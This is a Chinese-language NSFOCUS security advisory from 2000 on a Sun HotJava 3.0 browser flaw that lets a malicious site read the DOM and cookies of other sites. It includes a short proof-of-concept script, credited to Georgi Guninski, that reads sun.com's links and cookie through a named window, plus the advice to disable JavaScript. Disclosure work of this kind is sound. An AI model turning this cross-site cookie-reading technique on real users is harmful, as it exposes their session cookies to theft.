首页 -> 安全研究

安全研究

安全漏洞
Sun HotJava 浏览器存取任意DOM对象的漏洞

发布日期:2000-10-27
更新日期:2000-10-27

受影响系统:

Sun HotJava Browser 3.0
   - Sun Solaris 2.6
   - RedHat Linux 6.2 sparc
   - RedHat Linux 6.2 i386
   - RedHat Linux 6.2 alpha
   - Microsoft Windows 98
   - Microsoft Windows NT 4.0
   - Apple MacOS 8.0
描述:


恶意的网站管理员可能在目标系统中的用户使用Sun HotJava浏览器浏览其网站
时获得目标系统中的cookie。
如果从一个命名窗口中启动一段特殊构造的javascript脚本,就可以存取包含任
意URL的DOM对象(Document Object Model,简称DOM)。通过这种方法可以获
得包含敏感信息的cookie。

<* 来源:Georgi Guninski (guninski@guninski.com) *>



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Georgi Guninski <guninski@guninski.com>建立了如下演示页面:
http://www.guninski.com/hotjava-1.html
相关代码如下:
<SCRIPT>
window.open("http://www.sun.com","g");
setTimeout("window.open('javascript:alert(\"The first link is: \"+document.links[0].href);alert(\"The cookie is: \"+document.cookie)','g')",10000);
</SCRIPT>



建议:

临时解决办法:

    NSFOCUS建议您禁止javascript。

厂商补丁:

    Sun已经不再支持HotJava浏览器


浏览次数:7389
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障